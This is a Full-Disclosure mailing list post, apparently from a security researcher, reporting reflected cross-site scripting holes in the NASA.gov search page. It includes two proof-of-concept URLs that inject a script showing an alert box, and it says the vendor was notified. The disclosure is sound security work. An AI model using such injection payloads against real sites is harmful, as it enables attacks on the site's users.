Hi there, --------------------- WebSite: Vendor: NASA w0w! Risk: 7-5 -------------------- VENDOR NOTICED: Yes ( same email as this ) -------------------- I'm a little surprised today..... I found some cross site scripting holes in the NASA.gov search engine ,
PROOF OF CONCEPT: http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=null&Simple+Search.y=10"><script>alert("The XSS Prince\nOnce upon a time there was a prince\nthat liked so much XSS exploits....");</script> http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=null&Go.x=17"><script>alert("The%20XSS%20Prince\nOnce%20upon%20a%20time%20there%20was%20a%20prince\nthat%20liked%20so%20much%20XSS%20exploits....");</script>&Go.y=13 Remember: website security cannot be real if maintainers don't know how much danger is a xss hole ;-) contact info: __________ ------------------------------- 0x00->Lorenzo Hernandez Garcia-Hierro 0x01->/* not csh but sh */ 0x02->$ PATH=pretending!/usr/ucb/which sense 0x03-> no sense in pretending! __________________________________ PGP: Keyfingerprint 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B ID: 0x91805F5B ********************************** No Secure Root Group Security Research Team http://www.nsrg-security.com ______________________ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html